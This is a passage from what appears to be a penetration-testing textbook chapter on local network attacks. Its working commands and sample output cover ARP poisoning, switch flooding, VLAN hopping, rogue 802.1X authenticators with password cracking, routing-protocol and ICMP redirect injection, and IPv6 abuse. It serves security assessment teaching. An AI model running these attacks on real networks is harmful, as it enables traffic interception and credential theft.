Passive network sniffing

During a local network assessment exercise, a good starting point is to run a sniffer and evaluate the material exposed by the local network. Figure 5-2 shows Wireshark running on an Ethernet interface.

Within this example, we see that Wireshark records the following:

• Wellfleet Breath of Life (BOFL) frames

• Simple Service Discovery Protocol (SSDP) broadcast packets

• Microsoft computer browser service announcements

• Address Resolution Protocol (ARP) requests and replies

• An 802.1X EAPOL start frame

• Dropbox discovery broadcasts

Figure 5-2. Wireshark used to sniff local traffic

We learn details of IP ranges, subnet sizes, MAC addresses, and hostnames by reviewing captured frames and packets. If the network is misconfigured or switching fabric under stress, attackers can capture sensitive material via passive network sniffing.

If a switched Ethernet network is configured properly, you will only see broadcast frames and material destined for your MAC address. To compromise traffic sent between other hosts, you must consider active attack tactics, as follows.

ARP cache poisoning

ARP is used within local networks to map IPv4 addresses to underlying MAC addresses. Example 5-1 demonstrates normal ARP operation captured by tcpdump. In this case, 192.168.0.1 resolves and sends an ICMP echo request (ping) to 192.168.0.10. First, an ARP who-has message is broadcast to the network. Next, the destination host responds (using an ARP is-at reply, providing its MAC and IP addresses), and the ICMP operation is completed over IP.

root@kali:~# tcpdump -ennqti eth0 \( arp or icmp \)
tcpdump: listening on eth0
0:80:c8:f8:4a:51 ff:ff:ff:ff:ff:ff : arp who-has 192.168.0.10 tell 192.168.0.1
0:80:c8:f8:5c:73 0:80:c8:f8:4a:51 : arp reply 192.168.0.10 is-at 0:80:c8:f8:5c:73
0:80:c8:f8:4a:51 0:80:c8:f8:5c:73 : 192.168.0.1 > 192.168.0.10: icmp: echo request
0:80:c8:f8:5c:73 0:80:c8:f8:4a:51 : 192.168.0.10 > 192.168.0.1: icmp: echo reply

Each host maintains a cache of recently mapped IP and MAC address pairs. You can review the contents of the cache locally by using the arp -a command within most operating systems, as shown by Example 5-2.

root@kali:~#  arp -a
? (192.168.0.1) at 0:80:c8:f8:4a:51 [ether] on eth0
? (192.168.0.10) at 0:80:c8:f8:5c:73 [ether] on eth0
? (192.168.0.35) at 4:f1:3e:e1:a7:c9 [ether] on eth0
? (192.168.0.53) at 78:fd:94:1d:2f:aa [ether] on eth0
? (192.168.0.180) at 34:2:86:7c:63:b1 [ether] on eth0

ARP is stateless and lacks authentication. As such, the protocol is vulnerable to poisoning by sending unsolicited ARP replies. By injecting his MAC address into the ARP caches of victim systems, an adversary can achieve MITM, as demonstrated by Figure 5-3. In this case, the caches of systems A and B are poisoned with the MAC address of E.

Figure 5-3. ARP cache poisoning

To compromise traffic in both directions between peers (e.g., a host and its local gateway), IP forwarding is first enabled on the attacker’s system, and unsolicited ARP replies are sent to poison both systems. Tools, including Cain & Abel and Ettercap,³ automate this process. Upon achieving MITM, an attacker can use a number of utilities to obtain data and secrets, including the following:

• sslstrip⁴ to downgrade HTTPS sessions

• easy-creds,⁵ which is used to glean credentials from Ettercap, ssltrip, and others)

• Laurent Gaffié’s Responder⁶ to respond to name resolution requests

• Evilgrade⁷ to serve malicious content to victims by service impersonation

• Metasploit to perform service impersonation and further attacks

CAM table overflow

Ethernet switches use Content Addressable Memory (CAM) tables to map MAC address and VLAN assignments to individual ports, so that network frames are delivered correctly. An adversary can use the macof utility (part of Dug Song’s dsniff package⁹) to flood a switch with random Ethernet frames and IP packets, resulting in a CAM table overflow. Unable to map inbound frames to their destinations, the switch will fail-open and broadcast them to all ports (becoming a hub).

Example 5-3 demonstrates macof in use; flooding the local switch using the eth1 network interface within Kali Linux. The CAM table of an unhardened switch will overflow in a couple of minutes, and a network sniffer can then be used to capture leaked frames.

root@kali:~# macof -i eth1
aa:e1:ea:6b:6d:df 72:32:28:61:13:83 0.0.0.0.58748 > 0.0.0.0.46865: S 1907715: 1907715(0) win 512
3e:3f:ec:c:2c:f3 28:d0:25:5a:68:77 0.0.0.0.51035 > 0.0.0.0.29831: S 2009471: 2009471(0) win 512
61:dc:7b:62:1d:69 f3:55:91:7:a:9b 0.0.0.0.32352 > 0.0.0.0.33877: S 0468122: 0468122(0) win 512
3:9e:e:22:59:1a f6:77:65:7d:ac:d3 0.0.0.0.17314 > 0.0.0.0.746: S 9327237: 9327237(0) win 512
b:7a:f6:67:3f:66 74:25:99:70:4f:8c 0.0.0.0.31281 > 0.0.0.0.9475: S 5249557: 5249557(0) win 512

Dynamic trunking

In hardened environments, your port will have a static assignment, constraining you to a specific VLAN. Many switches support the Dynamic Trunking Protocol (DTP) by default, however, which an adversary can abuse to emulate a switch and receive traffic across all VLANs, as demonstrated by Figure 5-5.

Figure 5-5. Using DTP to enable trunking on a local port

The five port modes supported by Cisco switches are listed in Table 5-1.

Within Kali Linux, you can test for DTP support by using dtpscan.sh, as demonstrated by Example 5-4. The utility will return the port’s status (which can be referenced against Table 5-1).

root@kali:~# git clone https://github.com/commonexploits/dtpscan.git
root@kali:~# cd dtpscan/
root@kali:~/dtpscan# chmod a+x dtpscan.sh
root@kali:~/dtpscan# ./dtpscan.sh

########################################################
***   DTPScan - The VLAN DTP Scanner 1.3             ***
***   Detects DTP modes for VLAN Hopping (Passive)   ***
########################################################

[-] The following Interfaces are available

eth0
eth1

----------------------------------------------------------
[?] Enter the interface to scan from as the source
----------------------------------------------------------
eth1

[-] Now Sniffing DTP packets on interface eth1 for 90 seconds.
[+] DTP was found enabled in it's default state of 'Auto'.
[+] VLAN hopping will be possible.

Upon identifying a port that supports VLAN hopping (i.e., set to trunk, dynamic auto, or dynamic desirable), use Yersinia to enable trunking and evaluate the network configuration. Run the utility by using the following from the command line:¹¹

root@kali:~# yersinia –I

To launch an attack using a particular network interface, first navigate to the interfaces menu using “i” and then use “a” and “b” to toggle the interfaces, as shown:

┌─────────────── Global Interfaces ──────────────┐
│                                                │
│ a) eth0 (OFF)                                  │
│ b) eth1 (ON)                                   │
│                                                │
└──────────────── Press q to exit ───────────────┘

When an interface is selected (eth1 in this case), use “g” to select a protocol to use:

┌─ Choose protocol mode ────────────────────────┐
│ CDP    Cisco Discovery Protocol               │
│ DHCP   Dynamic Host Configuration Protocol    │
│ 802.1Q IEEE 802.1Q                            │
│ 802.1X IEEE 802.1X                            │
│ DTP    Dynamic Trunking Protocol              │
│ HSRP   Hot Standby Router Protocol            │
│ ISL    Inter-Switch Link Protocol             │
│ MPLS   MultiProtocol Label Switching          │
│ STP    Spanning Tree Protocol                 │
│ VTP    VLAN Trunking Protocol                 │
│                                               │
└─ ENTER to select  -  ESC/Q to quit ───────────┘

Upon selecting DTP, use “x” to present the available attacks and “1” to enable trunking. At this point, you should see data from the available VLANs using the 802.1Q menu (accessible via “g”), as follows:

┌── yersinia 0.7.3 by Slay & tomac - 802.1Q mode ────────────────[15:00:08]┐
│ VLAN L2Prot Src IP         Dst IP         IP Prot Iface  Last seen       │
│ 0250 ARP    10.121.5.1     10.121.5.17?   UKN      eth1  11 Aug 14:51:00 │
│ 0250 ARP    10.121.5.235   10.121.5.1?    UKN      eth1  11 Aug 14:52:13 │
│ 0250 ARP    10.121.5.87    10.121.5.1?    UKN      eth1  11 Aug 14:52:20 │
│ 0250 ARP    10.121.5.201   10.121.5.1?    UKN      eth1  11 Aug 14:52:48 │
│ 0250 ARP    10.121.5.240   10.121.5.1?    UKN      eth1  11 Aug 14:52:55 │
│ 0250 ARP    10.121.5.242   10.121.5.1?    UKN      eth1  11 Aug 14:53:06 │
│ 0250 ARP    10.121.5.246   10.121.5.1?    UKN      eth1  11 Aug 14:56:10 │
│ 0250 ARP    10.121.5.251   10.121.5.1?    UKN      eth1  11 Aug 14:57:53 │
│ 0250 ARP    10.121.5.248   10.121.5.1?    UKN      eth1  11 Aug 14:59:09 │

Attacking specific VLANs

Armed with VLAN and IP address values, you can configure virtual interfaces to attack each network. Example 5-5 shows how to join VLAN 250 under Kali Linux. If DHCP is not available, use ifconfig to set a static IP address. You can then attack the systems within the VLAN at Layer 2 (e.g., ARP cache poisoning and MITM), and then Layer 3 (e.g., port scanning and testing of exposed services).

root@kali:~# modprobe 8021q
root@kali:~# vconfig add eth1 250
Added VLAN with VID == 250 to IF -:eth1:-
root@kali:~# dhclient eth1.250
Reloading /etc/samba/smb.conf: smbd only.
root@kali:~# ifconfig eth1.250
eth1.250  Link encap:Ethernet  HWaddr 00:0e:c6:f0:29:65
          inet addr:10.121.5.86  Bcast:10.121.5.255  Mask:255.255.255.0
          inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:19 errors:0 dropped:0 overruns:0 frame:0
          TX packets:13 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:2206 (2.1 KiB)  TX bytes:1654 (1.6 KiB)

root@kali:~# arp-scan -I eth1.250 10.121.5.0/24
Interface: eth1.250, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.121.5.1    58:16:26:ff:58:89   Avaya, Inc
10.121.5.16   cc:f9:54:a7:da:eb   Avaya, Inc
10.121.5.17   cc:f9:54:a7:da:b2   Avaya, Inc
10.121.5.18   cc:f9:54:a7:6e:e5   Avaya, Inc
10.121.5.20   cc:f9:54:a7:95:1f   Avaya, Inc

802.1Q double-tagging

If the native VLAN used between switches to form a trunk is exposed to an adversary, that person can double-tag frames and send content to other networks, as demonstrated by Figure 5-6. The frame is tagged with both the native VLAN (1) and the target VLAN (20).

Figure 5-6. Double-tagging VLAN frames

A valid destination MAC and IP address is required to deliver content. The majority of practical attacks are unidirectional and utilize connectionless protocols (e.g., SNMP); however, it is possible to establish a TCP connection with a victim if that host can communicate with an IP under the attacker’s control (demonstrated by Figure 5-7). Andrew Vladimirov detailed the tactic in a post to the Full Disclosure mailing list,¹² and Steve Rouiller’s paper¹³ contains reference code for this attack within its appendixes (vlan-de-1-2.c).

You also can use this technique to port-scan the victim, by sending double-tagged TCP SYN packets using a spoofed source IP (of an attacker controlled system that is reachable by the victim) to each port and monitoring the behavior (e.g., TCP SYN/ACK responses from open ports, as described in Chapter 6).

Figure 5-7. Bypassing security controls by double-tagging

Layer 3 private VLAN bypass

In guest wireless networks and other environments, private VLAN¹⁴ (also known as port isolation) settings are used to prevent peers from interacting (i.e., clients connect to a wireless access point but cannot address one another). Depending on network ACLs (or lack thereof), it might be possible to send IP packets up to a router, which are then forwarded back to a neighboring peer. Figure 5-8 demonstrates the attack, by which an adversary sends a network frame with a crafted destination MAC (of the router) and IP address (of the target).

Figure 5-8. A private VLAN attack

The gateway receives the frame and forwards the packet to the destination. This attack can be exploited in the same manner as double-tagging (expanding on Steve Rouiller’s pvlan.c)—if the victim can connect to an IP that is attacker controlled, TCP sessions with listening ports can be established.

EAP message capture and offline attack

An adversary with privileged network access (e.g., the Ethernet cable to the supplicant) can sniff EAP-MD5 conversations and use a rogue 802.1X authenticator to obtain PEAP (MS-CHAPv2) credentials. Depending on the configuration of the supplicant, the rogue server might spawn a TLS certificate error, which the user will likely acknowledge to continue with authentication. The attack is demonstrated in Figure 5-10.

Figure 5-10. Deploying a rogue authenticator

root@kali:~# eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt
Collected all data necessary to attack password for "chris", starting attack.
User password is "tiffers1".
1202867 passwords in 4.06 seconds: 296272.66 passwords/second.

apt-get update
apt-get install libssl-dev libnl-dev
git clone http://bit.ly/2aNSPIS
wget http://bit.ly/2bjgwoJ
tar -zxf hostapd-2.2.tar.gz
cd hostapd-2.2
patch -p1 < ../hostapd-wpe/hostapd-wpe.patch
cd hostapd
make
cd ../../hostapd-wpe/certs
./bootstrap
cd ../../hostapd-2.2/hostapd
./hostapd-wpe hostapd-wpe.conf

root@kali:~/hostapd-2.2/hostapd# ./hostapd-wpe hostapd-wpe.conf
Configuration file: hostapd-wpe.conf
Using interface eth0 with hwaddr 00:0c:29:30:55:0d and ssid ""
eth0: interface state UNINITIALIZED->ENABLED
eth0: AP-ENABLED
mschapv2: Wed Aug 19 16:04:53 2015
username: chris
challenge: 79:4e:1d:af:93:8f:d8:a6
response: e1:11:13:59:56:06:02:dd:35:4a:0f:99:c8:6b:e1:fb:a3:04:ca:82:40:92:7c:f0

root@kali:~/hostapd-2.2/hostapd# genkeys -r /usr/share/wordlists/sqlmap.txt -f words.dat \
-n words.idx
genkeys 2.2 - generates lookup file for asleap. <jwright@hasborg.com>
Generating hashes for passwords (this may take some time) ...Done.
1202868 hashes written in 4.45 seconds:  270435.83 hashes/second
Starting sort (be patient) ...Done.
Completed sort in 13167671 compares.
Creating index file (almost finished) ...Done.
root@kali:~/hostapd-2.2/hostapd# asleap –C 79:4e:1d:af:93:8f:d8:a6 -R \
e1:11:13:59:56:06:02:dd:35:4a:0f:99:c8:6b:e1:fb:a3:04:ca:82:40:92:7c:f0 \
-f words.dat –n words.idx
asleap 2.2 – actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
        hash bytes:        4a39
        NT hash:           198bdbf5833a56fb40cdd1a64a39a1fc
        password:          katykat

Forcing EAP-MD5 authentication

Microsoft IAS, Cisco ACS, and other authentication servers support EAP-MD5, which an adversary can abuse with stolen credentials (i.e., username/password) to authenticate without providing a client certificate. This can be exploited within an enterprise environment to access the network using a system that is not part of the Windows domain, for example.

Within Kali Linux, you can configure wpa_supplicant to negotiate an 802.1X session over Ethernet (eth1) using EAP-MD5 and user credentials (e.g., chris/abc123), as shown in Example 5-8.

root@kali:~# cat /etc/wpa_supplicant.conf
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=wheel
ap_scan=0
network={
    key_mgmt=IEEE8021X
    eap=MD5
    identity="chris"
    password="abc123"
    eapol_flags=0
}
root@kali:~# wpa_supplicant -B –D wired –i eth1 –c /etc/wpa_supplicant.conf
root@kali:~#

Monitoring BPDUs

BPDU frames are captured and displayed within the Yersinia STP protocol view, as demonstrated by Example 5-10. If you cannot capture BPDU frames on your interfaces, it is unlikely that you will succeed in an STP attack.

┌── yersinia 0.7.3 by Slay & tomac - STP mode ─────────────────────[10:29:40]┐
│    RootId            BridgeId          Port       Iface Last seen          │
│    5080.760F0E13AC58 CB09.E7CD90117CAA 8002       eth1  26 Aug 10:29:39    │
│    5080.760F0E14AC58 CB09.E7CD90127CAA 8002       eth2  26 Aug 10:29:38    │
│    5080.760F0E13AC58 CB09.E7CD90117CAA 8002       eth2  26 Aug 10:27:05    │
│    5080.760F0E14AC58 CB09.E7CD90127CAA 8002       eth1  26 Aug 10:26:59    │
│                                                                            │

Root bridge takeover

Upon connecting to two switches within an environment, use Ettercap to establish a bridge and Yersinia to send crafted BPDU frames via each interface. Figure 5-12 shows the resulting topology, by which traffic between switches is compromised.

Figure 5-12. STP root bridge takeover

Example 5-11 demonstrates how to bridge eth1 and eth2 and sniff with Ettercap.

root@kali:~# ettercap -T -i eth1 -B eth2 -q

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

Listening on:
  eth1 -> 00:0C:29:30:55:0D
      192.168.1.4/255.255.255.0
      fe80::20c:29ff:fe30:550d/64

Listening on:
eth2 -> 00:0C:29:30:54:AC
      192.168.1.5/255.255.255.0
      fe80::20c:29ff:fe30:54ac/64

Privileges dropped to EUID 65534 EGID 65534...

  33 plugins
  42 protocol dissectors
  57 ports monitored
20388 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services

Starting Bridged sniffing...

Next, run Yersinia and use “I” to enable the bridged interfaces and disable eth0:

┌──────────── Global Interfaces ────────────┐
│                                           │
│ a) eth0 (OFF)                             │
│ b) eth1 (ON)                              │
│ b) eth2 (ON)                              │
│                                           │
└───────────── Press q to exit ─────────────┘

Upon using “g” to select the STP protocol mode, you should begin to see BPDUs. Finally, use “x” and option “4” to claim the root role within the topology. Yersinia will send spoofed frames using each interface, and the running Ettercap process should bear fruit as traffic is captured.

Identifying DHCP servers and configuration

Example 5-12 demonstrates how DHCP servers are enumerated by broadcasting local discovery messages with Nmap.²³ DHCPv6 is also supported.²⁴ As the protocol operates UDP, it’s prudent to run these scripts a handful of times.

root@kali:~# nmap --script broadcast-dhcp-discover

Starting Nmap 6.49BETA4 (https://nmap.org) at 2015-08-26 07:31 EDT
Pre-scan script results:
| broadcast-dhcp-discover:
|   Response 1 of 1:
|     IP Offered: 192.168.1.5
|     DHCP Message Type: DHCPOFFER
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|     Hostname: dhcppc3
|     Domain Name: dlink.com\x00
|     Renewal Time Value: 0s
|     Rebinding Time Value: 0s
|     IP Address Lease Time: 1s
|_    Server Identifier: 192.168.1.1

Active DHCP attacks

You can run the Responder DHCP script (/usr/share/responder/DHCP.py) within Kali Linux to establish a rogue DHCP server. Table 5-7 lists the available options. Setting a malicious gateway is not ideal, because the hijacked connection is only half-duplex (i.e., we capture egress packets from the client, but not the responses from the legitimate gateway). As such, I would recommend setting a rogue DNS or WPAD server to capture HTTP traffic and credentials in particular (as demonstrated later in this chapter).

-i

-d

-r

-p

-s

-n

-I

-w

-S

-R

Cracking authentication keys

The “jumbo” community edition of John the Ripper³⁷ supports the cracking of MD5 and HMAC-SHA-256 keys used for authentication purposes within HSRP,³⁸ VRRP,³⁹ EIGRP,⁴⁰ RIPv2, and OSPF.⁴¹ You first must install the package within Kali Linux, however, as follows:

git clone https://github.com/magnumripper/JohnTheRipper.git
cd JohnTheRipper/src/
./configure && make && make install

You can combine Ettercap and John the Ripper to extract and crack captured RIPv2 MD5 hashes, as shown in Example 5-15. Upon compromising a key used to authenticate router protocol messages, you can craft and prepare your own to modify the network topology.

root@kali:~# ettercap -Tqr capture.pcap > rip-hashes
root@kali:~# john rip-hashes
Loaded 2 password hashes with 2 different salts ("Keyed MD5" RIPv2)
Press 'q' or Ctrl-C to abort, almost any other key for status
letmein           (RIPv2-224.0.0.9-520)
letmein           (RIPv2-224.0.0.9-520)

HSRP and VRRP

Hot Standby Routing Protocol (HSRP) and the Virtual Router Redundancy Protocol (VRRP) are used in high-availability environments to provide failover support, as demonstrated by Figure 5-15. Routers send packets to local multicast groups announcing configuration and priority details.

Figure 5-15. A redundant router group

HSRP is a proprietary Cisco protocol with no RFC, whereas VRRP is standardized.⁴² To evaluate HSRP and VRRP support within an environment, use a network sniffer to capture the management traffic. You can use a number of tools to craft HSRP messages (including Scapy and Yersinia, as listed in Table 5-8), but only Loki provides VRRP support at this time.

root@kali:~/scapy# scapy
Welcome to Scapy (2.2.0)
>>> ip = IP(src='10.0.0.100', dst='224.0.0.2')
>>> udp = UDP()
>>> hsrp = HSRP(group=1, priority=255, virtualIP='10.0.0.1')
>>> send(ip/udp/hsrp, iface='eth1', inter=3, loop=1)

┌── yersinia 0.7.3 by Slay & tomac - HSRP mode ───────────────────[18:29:40]┐
│    SIP         DIP          Auth     VIP         Iface Last seen          │
│    10.0.0.2    224.0.0.2    abc123   10.0.0.1    eth1  26 Aug 18:28:09    │
│    10.0.0.3    224.0.0.2    abc123   10.0.0.1    eth1  26 Aug 18:26:06    │
│                                                                           │

while (true);
  do (hsrp -i eth1 -d 224.0.0.2 -v 10.0.0.1 -a abc123 -g 1 –S 10.0.0.100; sleep 3);
done

13:34:02 0:0:5e:0:1:1 1:0:5e:0:0:12 ip 60 10.0.0.7 > 224.0.0.18 VRRPv2-advertisement 
20: vrid=1 prio=100 authtype=simple intv1=1 addrs: 10.0.0.8 auth "abc123" [tos 0xc0] 
(ttl 244, id 0, len 40)
0x0000   45c0 0028 0000 0000 ff70 19e4 c0a8 0007        E..(.....p......
0x0010   e000 0012 2101 6401 0101 dd1f c0a8 0007        ....!.d.........
0x0020   6162 6331 3233 0000 0000 0000 0000 0000        abc123..........

root@kali:~/scapy# scapy
Welcome to Scapy (2.2.0)
>>> ip = IP(src='10.0.0.100', dst='224.0.0.18')
>>> udp = UDP()
>>> vrrp = VRRP(vrid=1, priority=255, addrlist=["10.0.0.7", "10.0.0.8"], ipcount=2, \
auth1='abc123')
>>> send(ip/udp/vrrp, iface='eth1', inter=3, loop=1)

RIP

Three versions of the Routing Information Protocol (RIP) exist—RIP,⁴⁵ RIPv2,⁴⁶ and RIPng.⁴⁷ RIP and RIPv2 use UDP datagrams sent to peers via port 520, whereas RIPng broadcasts datagrams to UDP port 521 via IPv6 multicast. RIPv2 introduced MD5 authentication support. RIPng does not incorporate native authentication; rather, it relies on optional IPsec AH and ESP headers⁴⁸ within IPv6.

RIP peers process unsolicited route advertisements in many cases. Consider the environment shown in Figure 5-16. Using Nemesis and Scapy, we can inject a route on the victim host (10.0.0.5), specifying the new gateway for the destination server (10.2.0.10) as 10.0.0.100.

Figure 5-16. A simple local area network

Nemesis requires setup and configuration within Kali Linux. Download the source code from http://nemesis.sourceforge.net, unpack to /root/nemesis-1.4/, and then execute the following commands:

cd
wget http://bit.ly/2bjmImD
tar xvfz libnet-1.0.2a.tar.gz
cd Libnet-1.0.2a/
./configure
make && make install
cd ../nemesis-1.4/
./configure -with-libnet-includes=/root/Libnet-1.0.2a/include \
-with-libnet-libraries=/root/Libnet-1.0.2a/lib
make && make install

Following is the Nemesis and Scapy attack syntax used for each RIP protocol version:

1. RIPv1

   nemesis rip –c 2 –V 1 –a 1 –i 10.2.0.10 –m 1 –V 1 –S 10.0.0.100 –D 10.0.0.5

2. RIPv2

   nemesis rip –c 2 –V 2 –a 1 –i 10.2.0.10 –k 0xffffffff –m 1 –V 1 –S 10.0.0.100 -D 10.0.0.5

3. RIPng (IPv6)

   root@kali:~/scapy# scapy
   Welcome to Scapy (2.2.0)
   >>> load_contrib("ripng")
   >>> ip = IPv6(src="2001:1234:cafe:babe::1", dst="ff02::9")
   >>> udp = UDP()
   >>> ripng = RIPngEntry(prefix="2001:1234:dead:beef::/64", nexthop="2001:1234:cafe:babe::1")
   >>> send (ip/udp/ripng, iface='eth0', inter=3, loop=1)

EIGRP

The Enhanced Interior Gateway Routing Protocol (EIGRP) is Cisco proprietary and can be run with or without authentication.⁴⁹ Coly supports capture of EIGRP broadcasts and injection of packets to manipulate routing configuration, as demonstrated by Example 5-19.

root@kali:~# svn checkout http://coly.googlecode.com/svn/trunk/ coly-read-only
A    coly-read-only/coly.py
Checked out revision 13.
root@kali:~# cd coly-read-only/
root@kali:~/coly-read-only# ./coly.py
EIGRP route injector, v0.1 Source: http://code.google.com/p/coly/
kali(router-config)# interface eth1
Interface set to eth1, IP: 10.0.0.100
kali(router-config)# discover
Discovering Peers and AS
Peer found: 10.0.0.3 AS: 50
AS set to 50
Peer found: 10.0.0.2 AS: 50
kali(router-config)# hi
Hello thread started
kali(router-config)# inject 10.2.0.0/24
Sending route to 10.0.0.3
Sending route to 10.0.0.2

At this point, the EIGRP peers (10.0.0.2 and 10.0.0.3) will send traffic destined for the remote 10.2.0.0/24 network to us (via 10.0.0.100). We could also specify an individual host, such as 10.2.0.10/32, or a larger range such as 10.2.0.0/16.

OSPF

Most Open Shortest Path First (OSPF)⁵⁰ implementations use MD5 to provide authentication between routers. Loki and John the Ripper can capture and attack MD5 hashes to reveal the key, which can then be used to advertise new routes, as demonstrated by Figure 5-17. The route parameters are set by using the Injection tab, and the key set under Connection.

To install and execute Loki within Kali Linux, execute the following commands:

wget http://bit.ly/2asPnCf
wget http://bit.ly/2apbpEU
wget http://bit.ly/2awOiXH
wget http://bit.ly/2aK279c
wget http://bit.ly/2aKbipx
dpkg -i pylibpcap_0.6.2-1_i386.deb
dpkg -i libssl0.9.8_0.9.8o-7_i386.deb
dpkg -i python-dpkt_1.6+svn54-1_all.deb
dpkg -i python-dumbnet_1.12-3.1_i386.deb
dpkg -i loki_0.2.7-1_i386.deb
/usr/bin/loki.py

Figure 5-17. Advertising a new OSPF route using Loki

ICMP redirect messages

Operating systems including Apple OS X Yosemite 10.10⁵¹ update local routing table entries upon parsing ICMP redirect (type 5) messages. The vulnerability was extensively exploited in 2014, as reported by Zimperium.⁵²

Example 5-20 demonstrates the Responder Icmp-Redirect.py utility used to reconfigure the routing table of a victim host (10.0.0.5) by specifying the gateway for a particular destination (10.2.0.10 in this case) as 10.0.0.100.

root@kali:~# cd /usr/share/responder/
root@kali:/usr/share/responder# chmod a+x Icmp-Redirect.py
root@kali:/usr/share/responder# ./Icmp-Redirect.py –I eth0 –i 10.0.0.100 –g 10.0.0.1 \
–t 10.0.0.5 –r 10.2.0.10

ICMP Redirect Utility 0.1.
Created by Laurent Gaffie, please send bugs/comments to lgaffie@trustwave.com

This utility combined with Responder is useful when you're sitting on a Windows based 
network.
Most Linux distributions discard by default ICMP Redirects.
Note that if the target is Windows, the poisoning will only last for 10mn, you can 
re-poison the target by launching this utility again.
If you wish to respond to the traffic, for example DNS queries your target issues, 
launch this command as root:

iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst 
10.2.0.10 --dport 53 -j DNAT --to-destination 10.0.0.100:53

[ARP]Target Mac address is : 00:17:f2:0f:5d:19
[ARP]Router Mac address is : 00:50:56:e2:a7:d5

[ICMP]10.0.0.5 should have been poisoned with a new route for target: 10.2.0.10.

Local IPv6 host enumeration

The THC IPv6 toolkit⁵⁴ and Metasploit include modules to identify local IPv6 hosts. Example 5-21 demonstrates ping6 used within Kali Linux to broadcast an ICMPv6 echo message to ff02::1 (IPv6 multicast), revealing the available hosts (via eth1). You can then use Nmap to scan individual hosts, as shown in Example 5-22. Note that fe80::/10 is the reserved IPv6 prefix for link-local addresses.

root@kali:~# ping6 -c2 -I eth1 ff02::1
PING ff02::1(ff02::1) from fe80::20e:c6ff:fef0:2965 eth1: 56 data bytes
64 bytes from fe80::20e:c6ff:fef0:2965: icmp_seq=1 ttl=64 time=0.040 ms
64 bytes from fe80::1a03:73ff:fe27:35a8: icmp_seq=1 ttl=64 time=1.23 ms
64 bytes from fe80::217:f2ff:fe0f:5d19: icmp_seq=1 ttl=64 time=1.23 ms
64 bytes from fe80::426c:8fff:fe2a:e708: icmp_seq=1 ttl=64 time=1.23 ms
64 bytes from fe80::e4d:e9ff:fec5:8f53: icmp_seq=1 ttl=64 time=1.47 ms
64 bytes from fe80::3ed9:2bff:fe9f:bc94: icmp_seq=1 ttl=64 time=1.62 ms
64 bytes from fe80::ba2a:72ff:fef1:b747: icmp_seq=1 ttl=64 time=1.85 ms
64 bytes from fe80::a2d3:c1ff:fed1:2a8e: icmp_seq=1 ttl=64 time=2.18 ms

root@kali:~# nmap -6 -e eth1 -sSVC -F fe80::217:f2ff:fe0f:5d19

Starting Nmap 6.47 (http://nmap.org) at 2015-08-17 15:01 EDT
Nmap scan report for fe80::217:f2ff:fe0f:5d19
PORT     STATE SERVICE      VERSION
22/tcp   open  ssh          OpenSSH 5.6 (protocol 2.0)
| ssh-hostkey:
|   1024 56:17:24:77:ab:fc:d0:9f:ad:91:79:3d:1a:80:49:c6 (DSA)
|_  2048 af:f8:27:9f:b1:ab:4b:c0:67:e4:e0:06:2f:4b:5f:68 (RSA)
88/tcp   open  kerberos-sec Heimdal Kerberos (server time: 2015-08-17 19:02:00Z)
5900/tcp open  vnc          Apple remote desktop vnc
| vnc-info:
|   Protocol version: 3.889
|   Security types:
|     Mac OS X security type (30)
|_    Mac OS X security type (35)
MAC Address: 00:17:F2:0F:5D:19 (Apple)
Service Info: OS: Mac OS X; CPE: cpe:/o:apple:mac_os_x

Host script results:
| address-info:
|   IPv6 EUI-64:
|     MAC address:
|       address: 00:17:f2:0f:5d:19
|_      manuf: Apple

Hosts within hardened environments might not respond to ICMPv6 echo requests but will parse router advertisement messages if they support stateless address autoconfiguration (SLAAC). Metasploit⁵⁵ exploits this behavior—a router with a fake prefix of 2001:1234:dead:beef::/64 is advertised, neighbor solicitation messages gathered, and the prefix replaced with fe80::/10 to identify valid link-local addresses (as shown in Example 5-23).

msf > use auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement
msf auxiliary(ipv6_neighbor_router_advertisement) > set INTERFACE eth1
msf auxiliary(ipv6_neighbor_router_advertisement) > run

[*] Sending router advertisement...
[*] Listening for neighbor solicitation...
[*]    |*| 2001:1234:dead:beef:5ed:a8d7:d46b:7ec
[*]    |*| 2001:1234:dead:beef:92b1:1cff:fe8e:e5d3
[*]    |*| 2001:1234:dead:beef:3ed9:2bff:fe9f:bc94
[*]    |*| 2001:1234:dead:beef:b4:3cff:fecb:eb14
[*]    |*| 2001:1234:dead:beef:1a03:73ff:fe27:35a8
[*]    |*| 2001:1234:dead:beef:e4d:e9ff:fec5:8f53
[*] Attempting to solicit link-local addresses...
[*]    |*| fe80::5ed:a8d7:d46b:7ec -> 90:b1:1c:65:0c:09
[*]    |*| fe80::92b1:1cff:fe8e:e5d3 -> 90:b1:1c:8e:e5:d3
[*]    |*| fe80::3ed9:2bff:fe9f:bc94 -> 3c:d9:2b:9f:bc:94
[*]    |*| fe80::b4:3cff:fecb:eb14 -> 02:b4:3c:cb:eb:14
[*]    |*| fe80::1a03:73ff:fe27:35a8 -> 18:03:73:27:35:a8
[*]    |*| fe80::e4d:e9ff:fec5:8f53 -> 0c:4d:e9:c5:8f:53

Intercepting local IPv6 traffic

The THC IPv6 toolkit includes three utilities to impersonate neighbors and routers, as listed Table 5-10. In addition to these data link attacks, you can use rogue DHCPv6 and WPADv6 services to proliferate name server and web proxy details to clients.

Many IPv4 environments contain hosts that support (and prefer) IPv6, including Microsoft Windows and Apple OS X. Figure 5-20 demonstrates how, upon configuring a rogue IPv6 gateway in the environment, you can create an overlay network and compromise traffic.

Figure 5-20. Implementing a malicious IPv6 overlay network

A DNS server is used to provide IPv6 destinations for lookup requests from clients, ensuring that sessions to IPv4 destinations are routed via our rogue IPv6 gateway. The process is shown in Figure 5-21.

Figure 5-21. Serving IPv6 clients via NAT64 and DNS64

Practical execution of this attack involves the following:

• Configuring a NAT64 gateway, performing IPv6-to-IPv4 translation

